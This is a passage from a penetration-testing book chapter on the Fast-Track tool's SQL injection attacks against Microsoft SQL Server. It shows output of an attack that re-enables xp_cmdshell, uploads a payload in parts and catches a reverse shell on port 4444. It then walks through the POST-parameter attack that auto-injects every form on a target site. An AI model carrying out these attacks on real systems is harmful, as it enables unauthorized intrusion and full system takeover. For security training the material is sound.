background image

166

Chapter 11

Running cleanup before executing the payload...
Running the payload on the server...Sending initial request to enable 
xp_cmdshell if disabled...
Sending first portion of payload (1/4)...
Sending second portion of payload (2/4)...
Sending third portion of payload (3/4)...
Sending the last portion of the payload (4/4)...
Running cleanup before executing the payload...
Running the payload on the server...
listening on [any] 4444 ...
connect to [10.211.55.130] from (UNKNOWN) [10.211.55.128] 1041
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>

Success! Full access was granted to the system, all through SQL injection.
Note that this attack will not succeed if parameterized SQL queries or 

stored procedures are in use. Note, too, that the required configuration 
for this attack is very minimal. After selecting 

SQL Injector - Query String 

Parameter Attack 

 from the menu of attacks, you simply direct Fast-Track to 

the point of SQL injection  . If the 

xp_cmdshell

 stored procedure is disabled, 

Fast-Track will automatically re-enable it and attempt privilege escalation of 
MS SQL.

SQL Injector—POST Parameter Attack

Fast-Track’s POST parameter attack requires even less configuration than 
the preceding query string parameter attack. For this attack, simply pass Fast-
Track the URL of the website you want to attack, and it will automatically 
detect the form to attack.

Enter which SQL Injector you want to use

1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack

Enter your choice: 

2

This portion allows you to attack all forms on a specific website without having to specify
each parameter. Just type the URL in, and Fast-Track will auto SQL inject to each parameter
looking for both error based injection as well as blind based SQL injection. Simply type
the website you want to attack, and let it roll.

Example: http://www.sqlinjectablesite.com/index.aspx

Enter the URL to attack: 

http://www.secmaniac.com

Forms detected...attacking the parameters in hopes of exploiting SQL Injection..